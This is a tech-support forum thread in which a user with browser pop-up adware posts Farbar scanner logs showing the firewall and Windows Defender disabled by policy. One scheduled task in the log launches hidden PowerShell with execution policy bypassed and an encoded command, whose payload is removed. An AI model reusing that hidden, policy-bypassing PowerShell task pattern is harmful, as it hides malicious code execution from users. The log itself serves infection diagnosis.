
Computer infested with viruses

aQuaK1337
created

Hello, for a few days now I have been struggling with an ad problem (I have an adblocker, but it does not help): when I click anywhere in the browser window, new pages open, some kind of contests and so on. It looks more or less like this:

http://screenshot.sh/m8Us0WrWVlCT1

I have already scanned the computer with programs such as AVG, ESET, AdwCleaner, Malware. None of them worked.

Please help.

Matematyk0
comment

Open the browser's add-ons/extensions, find the parasite and either disable it or uninstall it.

aQuaK1337
comment

And what are these logs for?

Twój_Anioł_Stróż
comment

And what are these logs for?

Based on them I can determine whether there is an infection or not.

aQuaK1337
comment

I definitely have viruses, I just want to remove them.

Twój_Anioł_Stróż
comment

I definitely have viruses, I just want to remove them.

Without the logs I have no way of helping you.

aQuaK1337
comment

Farbar Service Scanner Version: 03-01-2016
Ran by Rafał (administrator) on 12-01-2016 at 17:55:57
Running from "C:\Users\Rafał\Desktop\pulpit"
Microsoft Windows 8.1 Pro  (X64)
Boot Mode: Normal
****************************************************************

Internet Services:
============

Connection Status:
==============
Localhost is accessible.
LAN connected.
Attempt to access Google IP returned error. Google IP is unreachable
Google.com is accessible.
Yahoo.com is accessible.


Windows Firewall:
=============
mpsdrv Service is not running. Checking service configuration:
The start type of mpsdrv service is OK.
The ImagePath of mpsdrv service is OK.

MpsSvc Service is not running. Checking service configuration:
The start type of MpsSvc service is set to Demand. The default start type is Auto.
The ImagePath of MpsSvc service is OK.
The ServiceDll of MpsSvc service is OK.


Firewall Disabled Policy:
==================
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall"=DWORD:0


System Restore:
============

System Restore Policy:
========================


Action Center:
============


Windows Update:
============

Windows Autoupdate Disabled Policy:
============================


Windows Defender:
==============
WinDefend Service is not running. Checking service configuration:
The start type of WinDefend service is set to Demand. The default start type is Auto.
The ImagePath of WinDefend: ""%ProgramFiles%\Windows Defender\MsMpEng.exe"".


Windows Defender Disabled Policy:
==========================
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender]
"DisableAntiSpyware"=DWORD:1


Other Services:
==============


File Check:
========
C:\Windows\System32\nsisvc.dll => File is digitally signed
C:\Windows\System32\drivers\nsiproxy.sys => File is digitally signed
C:\Windows\System32\dhcpcore.dll => File is digitally signed
C:\Windows\System32\drivers\afd.sys => File is digitally signed
C:\Windows\System32\drivers\tdx.sys => File is digitally signed
C:\Windows\System32\Drivers\tcpip.sys => File is digitally signed
C:\Windows\System32\dnsrslvr.dll => File is digitally signed
C:\Windows\System32\mpssvc.dll => File is digitally signed
C:\Windows\System32\bfe.dll => File is digitally signed
C:\Windows\System32\drivers\mpsdrv.sys => File is digitally signed
C:\Windows\System32\wscsvc.dll => File is digitally signed
C:\Windows\System32\wbem\WMIsvc.dll => File is digitally signed
C:\Windows\System32\wuaueng.dll => File is digitally signed
C:\Windows\System32\qmgr.dll => File is digitally signed
C:\Windows\System32\es.dll => File is digitally signed
C:\Windows\System32\cryptsvc.dll => File is digitally signed
C:\Program Files\Windows Defender\MpSvc.dll => File is digitally signed
C:\Program Files\Windows Defender\MsMpEng.exe => File is digitally signed
C:\Windows\System32\ipnathlp.dll => File is digitally signed
C:\Windows\System32\iphlpsvc.dll => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed


**** End of log ****

Twój_Anioł_Stróż
comment (edited)

I meant the logs from FRST, not from FSS.

aQuaK1337
comment

Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x64) Wersja:10-01-2015 01
Uruchomiony przez Rafał (2016-01-14 18:11:00)
Uruchomiony z C:\Users\Rafał\Downloads
Windows 8.1 Pro (X64) (2015-12-30 14:34:41)
Tryb startu: Normal
==========================================================


==================== Konta użytkowników: =============================

Administrator (S-1-5-21-3176993754-4223996750-584129700-500 - Administrator - Disabled)
Gość (S-1-5-21-3176993754-4223996750-584129700-501 - Limited - Disabled)
Rafał (S-1-5-21-3176993754-4223996750-584129700-1001 - Administrator - Enabled) => C:\Users\Rafał

==================== Centrum zabezpieczeń ========================

(Załączenie wejścia w fixlist spowoduje jego usunięcie.)

AV: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: AVG AntiVirus Free Edition (Enabled - Out of date) {4D41356F-32AD-7C42-C820-63775EE4F413}
AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: AVG AntiVirus Free Edition (Enabled - Out of date) {F620D48B-1497-73CC-F290-58052563BEAE}

==================== Zainstalowane programy ======================

(W fixlist dozwolone tylko załączanie programów adware z flagą "Hidden" w celu ich uwidocznienia. Programy adware powinny zostać w poprawny sposób odinstalowane.)

µTorrent (HKU\S-1-5-21-3176993754-4223996750-584129700-1001\...\uTorrent) (Version: 3.4.5.41372 - BitTorrent Inc.)
7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.267 - Adobe Systems Incorporated)
Adobe Reader 9.5.0 - Polish (HKLM-x32\...\{AC76BA86-7AD7-1045-7B44-A95000000001}) (Version: 9.5.0 - Adobe Systems Incorporated)
AMD Catalyst Install Manager (HKLM\...\{ED79BF8A-BDEB-D95B-FC6C-E6DB27DB9714}) (Version: 8.0.881.0 - Advanced Micro Devices, Inc.)
AVG (HKLM\...\AvgZen) (Version: 1.31.1.48846 - AVG Technologies)
AVG (Version: 16.31.7356 - AVG Technologies) Hidden
AVG 2016 (Version: 16.0.4489 - AVG Technologies) Hidden
AVG Protection (HKLM\...\AVG) (Version: 2016.31.7356 - AVG Technologies)
AVG Zen (Version: 1.31.9 - AVG Technologies) Hidden
Blades of Time - Limited Edition (HKLM-x32\...\Blades of Time - Limited Edition_is1) (Version:  - )
Catalyst Control Center (HKLM-x32\...\WUCCCApp) (Version: 1.00.0000 - AMD)
CCleaner (HKLM\...\CCleaner) (Version: 5.13 - Piriform)
Classic Shell (HKLM\...\{D4B3454F-7529-4F5F-851D-2C36933F7D64}) (Version: 4.2.5 - IvoSoft)
Convert DOC to PDF For Word 3.50 (HKLM-x32\...\Convert DOC to PDF For Word_is1) (Version:  - 8848Soft, Inc.)
Counter-Strike: Global Offensive (HKLM-x32\...\Steam App 730) (Version:  - Valve)
Crysis® 2 (HKLM-x32\...\{6033673D-2530-4587-8AD0-EB059FC263F9}) (Version: 1.0.0.0 - Electronic Arts)
DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 10.2.0.0114 - Disc Soft Ltd)
FIFA 16 (HKLM-x32\...\{28FA2805-7992-4A28-844B-040C57204718}) (Version: 1.4.64673.4 - Electronic Arts)
Flat Out 2 v1.0 (HKLM-x32\...\Flat Out 2_is1) (Version:  - Empire / Áóęŕ)
FMW 1 (Version: 1.42.1 - AVG Technologies) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 47.0.2526.106 - Google Inc.)
Google Update Helper (x32 Version: 1.3.29.1 - Google Inc.) Hidden
HashCheck Shell Extension (x86-32) (HKLM-x32\...\HashCheck Shell Extension) (Version: 2.1.11.1 - Kai Liu)
HashCheck Shell Extension (x86-64) (HKLM\...\HashCheck Shell Extension) (Version: 2.1.11.1 - Kai Liu)
Intel(R) Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1008 - Intel Corporation)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.20.1337 - Intel Corporation)
Intel(R) Small Business Advantage (HKLM-x32\...\{6A6D86CD-B004-46b7-8951-7BB75A776F8C}) (Version: 1.1.27.5565 - Intel(R) Corporation)
Intel(R) Smart Connect Technology 3.0 x64 (HKLM\...\{B2630BA9-0AFD-4BF4-98F3-29BC2143C834}) (Version: 3.0.41.1571 - Intel)
Intel(R) Update Manager (x32 Version: 1.0.0.34813 - Intel Corporation) Hidden
Java 8 Update 66 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218066F0}) (Version: 8.0.660.18 - Oracle Corporation)
Kels' Win7 CPL PacK! (HKLM\...\CPL Pack) (Version: 5.2 - Kelsenellenelvian EverDawn)
League of Legends (HKLM-x32\...\{92606477-9366-4D3B-8AE3-6BE4B29727AB}) (Version: 1.3 - Riot Games)
LogMeIn Hamachi (HKLM-x32\...\LogMeIn Hamachi) (Version: 2.2.0.410 - LogMeIn, Inc.)
LogMeIn Hamachi (x32 Version: 2.2.0.410 - LogMeIn, Inc.) Hidden
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Minecraft (HKLM-x32\...\{1C16BCA3-EBC1-49F6-8623-8FBFB9CCC872}) (Version: 1.0.3.0 - Mojang)
Mozilla Firefox 43.0.4 (x86 pl) (HKLM-x32\...\Mozilla Firefox 43.0.4 (x86 pl)) (Version: 43.0.4 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 43.0.4 - Mozilla)
MSI Afterburner 2.2.2 (HKLM-x32\...\Afterburner) (Version: 2.2.2 - MSI Co., LTD)
Nero 2016 (HKLM-x32\...\{049045D5-0C46-4E78-A83F-83E993D91A7F}) (Version: 17.0.02300 - Nero AG)
Nero Info (HKLM-x32\...\{F030BFE8-8476-4C08-A553-233DE80A2BE1}) (Version: 16.0.2000 - Nero AG)
Opera Stable 34.0.2036.41 (HKLM-x32\...\Opera 34.0.2036.41) (Version: 34.0.2036.41 - Opera Software)
Origin (HKLM-x32\...\Origin) (Version: 9.11.2.10120 - Electronic Arts, Inc.)
Prerequisite installer (x32 Version: 17.0.0002 - Nero AG) Hidden
Razer Cortex (HKLM-x32\...\Razer Cortex_is1) (Version: 6.4.6.10930 - Razer Inc.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.3.730.2012 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6738 - Realtek Semiconductor Corp.)
ScreenShooter5 (HKU\S-1-5-21-3176993754-4223996750-584129700-1001\...\ScreenShooter5) (Version: 5.0 - )
Skype™ 7.17 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.17.105 - Skype Technologies S.A.)
Software Informer 1.4.1303.0 (HKLM\...\Software Informer_is1) (Version:  - Informer Technologies, Inc.)
Stashimi Stub Installer (x32 Version: 18.001.1 - Nero AG) Hidden
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
SteelSeries Engine 3.6.2 (HKLM\...\SteelSeries Engine 3) (Version: 3.6.2 - SteelSeries ApS)
TakeOwnershipEx (HKLM-x32\...\TakeOwnershipEx) (Version: 1.2.0.1 - hxxp://winaero.com)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.18 - TeamSpeak Systems GmbH)
TmNationsForever (HKLM-x32\...\TmNationsForever_is1) (Version:  - Nadeo)
UltraUXThemePatcher (HKLM-x32\...\UltraUXThemePatcher) (Version: 2.2.0.0 - Manuel Hoefs (Zottel))
Unlocker 1.9.2 (HKLM\...\Unlocker) (Version: 1.9.2 - Cedrick Collomb)
Viking - Battle for Asgard (HKLM-x32\...\Viking - Battle for Asgard_is1) (Version:  - )
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
WinRAR 5.30 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.30.0 - win.rar GmbH)

==================== Niestandardowe rejestracje CLSID (filtrowane): ==========================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)


==================== Zaplanowane zadania (filtrowane) =============

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

Task: {37E283AF-A152-4ACF-BA11-95942E615090} - System32\Tasks\SoftwareInformerService => C:\Program Files\Software Informer\softinfo.exe [2015-06-26] (Informer Technologies, Inc.)
Task: {3D130900-BA53-43C7-BDD8-8F2306411FAD} - \AutoPico Daily Restart -> Brak pliku <==== UWAGA
Task: {429BE338-E175-425D-99DA-C7EBE9F2259A} - System32\Tasks\Opera scheduled Autoupdate 1451488161 => C:\Program Files (x86)\Opera\launcher.exe [2015-12-15] (Opera Software)
Task: {4F6B1ED0-DE98-4C54-BA87-6C627BA6020E} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2015-12-08] (Piriform Ltd)
Task: {69393118-CD84-4C39-AB41-148AF4A58A34} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-12-30] (Google Inc.)
Task: {7AC812F8-AC4F-4D30-AF8F-CB34AF51F94D} - System32\Tasks\{966DF9F5-18FB-4D4D-9714-2F1FAAA6473D} => Chrome.exe hxxp://www.skype.com/go/downloading?source=lightinstaller&amp;ver=7.17.0.105&amp;LastError=12007
Task: {80A91B57-A23B-4EAB-91BA-21CC4536BFD4} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-10-28] (Adobe Systems Incorporated)
Task: {A6FA8D57-2A41-4229-9834-8D8FF8EBF158} - System32\Tasks\Nero\Nero Info => C:\Program Files (x86)\Common Files\Nero\Nero Info\NeroInfo.exe [2015-06-04] (Nero AG)
Task: {AAA89DAF-1B4F-447D-AF21-7F0559AC9962} - \Microsoft\Windows\Windows Media Sharing\UpdateLibrary -> Brak pliku <==== UWAGA
Task: {BA48FCCD-F364-42BF-B684-E7B4DCC4D3D1} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto
Task: {E3769789-2BF0-4AAE-8D99-3EDAA2BCBA48} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-12-30] (Google Inc.)
Task: {F7EAA3E0-64EF-4A85-B97F-1B31AB700F21} - System32\Tasks\{0D7D0947-0A08-0E04-0511-08040D7E1109} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand [Base64-encoded command removed]

(Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.)

Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Skróty =============================

(Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.)

==================== Załadowane moduły (filtrowane) ==============

2015-09-23 22:41 - 2015-09-23 22:41 - 00188072 _____ () C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe
2013-08-22 08:19 - 2013-08-22 07:54 - 00174592 _____ () C:\Windows\system32\WinMetadata\Windows.UI.winmd
2015-12-30 15:42 - 2012-10-22 06:22 - 01199648 ____R () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\ACE.dll
2015-12-05 10:21 - 2015-12-05 10:21 - 00933056 ____R () C:\Program Files (x86)\Skype\Phone\ssScreenVVS2.dll
2016-01-08 16:00 - 2016-01-08 16:00 - 40500224 _____ () C:\Program Files (x86)\AVG\UiDll\2171\libcef.dll
2015-12-31 08:37 - 2015-10-28 16:50 - 00264192 _____ () D:\Razer Cortex\D3DX8Wrapper.dll
2015-12-31 08:36 - 2015-10-28 16:50 - 00724480 _____ () D:\Razer Cortex\Cef\CefSharp.Core.dll
2015-12-31 08:36 - 2015-10-28 16:50 - 41289216 _____ () D:\Razer Cortex\Cef\libcef.dll
2015-12-31 08:36 - 2015-10-28 16:50 - 00544256 _____ () D:\Razer Cortex\Cef\CefSharp.BrowserSubprocess.Core.dll
2015-12-31 08:36 - 2015-10-28 16:50 - 01482240 _____ () D:\Razer Cortex\Cef\libglesv2.dll
2015-12-31 08:36 - 2015-10-28 16:50 - 00073728 _____ () D:\Razer Cortex\Cef\libegl.dll

==================== Alternate Data Streams (filtrowane) =========

(Załączenie wejścia w fixlist spowoduje usunięcie strumienia ADS.)


==================== Tryb awaryjny (filtrowane) ===================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Wartość "AlternateShell" zostanie przywrócona.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MSIServer => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Hamachi2Svc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MSIServer => ""="Service"

==================== EXE - Powiązania (filtrowane) ===============

(Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci.)


==================== Internet Explorer - Witryny zaufane i z ograniczeniami ===============

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru.)


==================== Hosts - zawartość: ===============================

(Użycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.)

2013-08-22 14:25 - 2013-08-22 14:25 - 00000824 ____N C:\Windows\system32\Drivers\etc\hosts


==================== Inne obszary ============================

(Obecnie brak automatycznej naprawy dla tej sekcji.)

HKU\S-1-5-21-3176993754-4223996750-584129700-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Rafał\Desktop\31011-steelseries-1920x1080-computer-wallpaper.jpg
DNS Servers: 109.196.48.2 - 8.8.4.4
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
mpsdrv => Usługa "Zapora systemu Windows" nie jest uruchomiona.
MpsSvc => Usługa "Zapora systemu Windows" nie jest uruchomiona.

==================== MSCONFIG/TASK MANAGER - Wyłączone elementy ==

(Obecnie brak automatycznej naprawy dla tej sekcji.)

MSCONFIG\Services: Disc Soft Lite Bus Service => 3
MSCONFIG\Services: ISCTAgent => 2
HKLM\...\StartupApproved\StartupFolder: => "SteelSeries Engine 3.lnk"
HKU\S-1-5-21-3176993754-4223996750-584129700-1001\...\StartupApproved\Run: => "Software Informer"
HKU\S-1-5-21-3176993754-4223996750-584129700-1001\...\StartupApproved\Run: => "ScreenShooter"
HKU\S-1-5-21-3176993754-4223996750-584129700-1001\...\StartupApproved\Run: => "EADM"
HKU\S-1-5-21-3176993754-4223996750-584129700-1001\...\StartupApproved\Run: => "CCleaner Monitoring"

==================== Reguły Zapory systemu Windows (filtrowane) ===============

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [TCP Query User{B57C08E1-C3AA-4558-9C0F-1C2924A45FD4}C:\program files (x86)\tmnationsforever\tmforever.exe] => (Allow) C:\program files (x86)\tmnationsforever\tmforever.exe
FirewallRules: [UDP Query User{8BCB6E86-2B82-45B5-A009-95BAE7B41DDF}C:\program files (x86)\tmnationsforever\tmforever.exe] => (Allow) C:\program files (x86)\tmnationsforever\tmforever.exe
FirewallRules: [{DC0A7461-717E-4333-A5A5-11276B99B3C4}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{650C9E4F-6FEF-49DC-AEE3-98FBCBBD3B4E}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{D97F1DFD-E865-4E1D-8890-54BA6B7485A0}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{B04000A9-50FE-4B56-91F4-C56C05B9543D}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe

==================== Punkty Przywracania systemu =========================

30-12-2015 15:39:06 Zainstalowany program DirectX
31-12-2015 16:36:09 Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501
02-01-2016 17:21:42 Zainstalowane League of Legends
04-01-2016 11:08:41 Installed ProductName from default.wxl
07-01-2016 09:01:09 Removed Adobe Acrobat Reader DC - Polish.
08-01-2016 15:06:19 Removed AVG
11-01-2016 18:00:16 Installed LogMeIn Hamachi
Sprawdź usługę "winmgmt" lub napraw WMI.


==================== Wadliwe urządzenia w Menedżerze urządzeń =============


==================== Błędy w Dzienniku zdarzeń: =========================

Dziennik Aplikacja:
==================
Error: (01/14/2016 02:45:54 PM) (Source: Steam Client Service) (EventID: 1) (User: )
Description: Error: Failed to add firewall exception for C:\Program Files (x86)\Steam\bin\steamwebhelper.exe

Error: (01/14/2016 02:45:54 PM) (Source: Steam Client Service) (EventID: 1) (User: )
Description: Error: Failed to add firewall exception for C:\Program Files (x86)\Steam\steam.exe

Error: (01/13/2016 06:47:39 PM) (Source: Steam Client Service) (EventID: 1) (User: )
Description: Error: Failed to add firewall exception for C:\Program Files (x86)\Steam\bin\steamwebhelper.exe

Error: (01/13/2016 06:47:39 PM) (Source: Steam Client Service) (EventID: 1) (User: )
Description: Error: Failed to add firewall exception for C:\Program Files (x86)\Steam\steam.exe

Error: (01/13/2016 05:08:24 PM) (Source: Steam Client Service) (EventID: 1) (User: )
Description: Error: Failed to add firewall exception for C:\Program Files (x86)\Steam\bin\steamwebhelper.exe

Error: (01/13/2016 05:08:24 PM) (Source: Steam Client Service) (EventID: 1) (User: )
Description: Error: Failed to add firewall exception for C:\Program Files (x86)\Steam\steam.exe

Error: (01/13/2016 08:07:11 AM) (Source: Steam Client Service) (EventID: 1) (User: )
Description: Error: Failed to add firewall exception for C:\Program Files (x86)\Steam\bin\steamwebhelper.exe

Error: (01/13/2016 08:07:11 AM) (Source: Steam Client Service) (EventID: 1) (User: )
Description: Error: Failed to add firewall exception for C:\Program Files (x86)\Steam\steam.exe

Error: (01/13/2016 07:28:02 AM) (Source: Steam Client Service) (EventID: 1) (User: )
Description: Error: Failed to add firewall exception for C:\Program Files (x86)\Steam\bin\steamwebhelper.exe

Error: (01/13/2016 07:28:02 AM) (Source: Steam Client Service) (EventID: 1) (User: )
Description: Error: Failed to add firewall exception for C:\Program Files (x86)\Steam\steam.exe


Dziennik System:
=============
Error: (01/14/2016 05:38:46 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Usługa Grupowanie sieci równorzędnej zależy od usługi Protokół rozpoznawania nazw równorzędnych, której nie można uruchomić z powodu następującego błędu:
%%1062

Error: (01/14/2016 05:38:44 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Usługa Grupowanie sieci równorzędnej zależy od usługi Protokół rozpoznawania nazw równorzędnych, której nie można uruchomić z powodu następującego błędu:
%%1062

Error: (01/14/2016 05:38:42 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Usługa Grupowanie sieci równorzędnej zależy od usługi Protokół rozpoznawania nazw równorzędnych, której nie można uruchomić z powodu następującego błędu:
%%1062

Error: (01/14/2016 05:24:44 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: Upłynął limit czasu (30000 ms) podczas oczekiwania na odpowiedź transakcji z usługi avgsvc.

Error: (01/14/2016 05:24:14 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: Upłynął limit czasu (30000 ms) podczas oczekiwania na odpowiedź transakcji z usługi avgsvc.

Error: (01/14/2016 02:45:02 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Usługa Grupowanie sieci równorzędnej zależy od usługi Protokół rozpoznawania nazw równorzędnych, której nie można uruchomić z powodu następującego błędu:
%%1062

Error: (01/14/2016 02:45:00 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Usługa Grupowanie sieci równorzędnej zależy od usługi Protokół rozpoznawania nazw równorzędnych, której nie można uruchomić z powodu następującego błędu:
%%1062

Error: (01/14/2016 02:44:54 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Usługa Grupowanie sieci równorzędnej zależy od usługi Protokół rozpoznawania nazw równorzędnych, której nie można uruchomić z powodu następującego błędu:
%%1062

Error: (01/14/2016 02:44:52 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Usługa Grupowanie sieci równorzędnej zależy od usługi Protokół rozpoznawania nazw równorzędnych, której nie można uruchomić z powodu następującego błędu:
%%1062

Error: (01/13/2016 09:19:34 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: Upłynął limit czasu (30000 ms) podczas oczekiwania na odpowiedź transakcji z usługi avgsvc.


CodeIntegrity:
===================================
  Date: 2016-01-13 08:06:14.964
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Av\avgidsagent.exe) attempted to load \Device\HarddiskVolume2\Program Files (x86)\AVG\Framework\Common\avgfmwbasex.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-01-13 07:27:30.818
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Av\avgidsagent.exe) attempted to load \Device\HarddiskVolume2\Program Files (x86)\AVG\Framework\Common\avgfmwbasex.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-01-13 07:27:25.474
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Av\avgidsagent.exe) attempted to load \Device\HarddiskVolume2\Program Files (x86)\AVG\Framework\Common\avgfmwbasex.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-01-13 07:26:57.363
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Av\avgidsagent.exe) attempted to load \Device\HarddiskVolume2\Program Files (x86)\AVG\Framework\Common\avgfmwbasex.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-01-13 07:26:57.332
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Av\avgidsagent.exe) attempted to load \Device\HarddiskVolume2\Program Files (x86)\AVG\Framework\Common\avgfmwbasex.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-01-13 07:26:57.317
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Av\avgidsagent.exe) attempted to load \Device\HarddiskVolume2\Program Files (x86)\AVG\Framework\Common\avgfmwbasex.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-01-13 07:26:57.285
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Av\avgidsagent.exe) attempted to load \Device\HarddiskVolume2\Program Files (x86)\AVG\Framework\Common\avgfmwbasex.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-01-13 07:26:57.254
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Av\avgidsagent.exe) attempted to load \Device\HarddiskVolume2\Program Files (x86)\AVG\Framework\Common\avgfmwbasex.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-01-12 18:55:34.150
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Av\avgidsagent.exe) attempted to load \Device\HarddiskVolume2\Program Files (x86)\AVG\Framework\Common\avgfmwbasex.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-01-12 15:47:35.123
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Av\avgidsagent.exe) attempted to load \Device\HarddiskVolume2\Program Files (x86)\AVG\Framework\Common\avgfmwbasex.dll that did not meet the Custom 3 / Antimalware signing level requirements.


==================== Statystyki pamięci ===========================

Procesor: Intel(R) Core(TM) i5-3470 CPU @ 3.20GHz
Procent pamięci w użyciu: 27%
Całkowita pamięć fizyczna: 8122.92 MB
Dostępna pamięć fizyczna: 5910.72 MB
Całkowita pamięć wirtualna: 8954.92 MB
Dostępna pamięć wirtualna: 5988.95 MB

==================== Dyski ================================

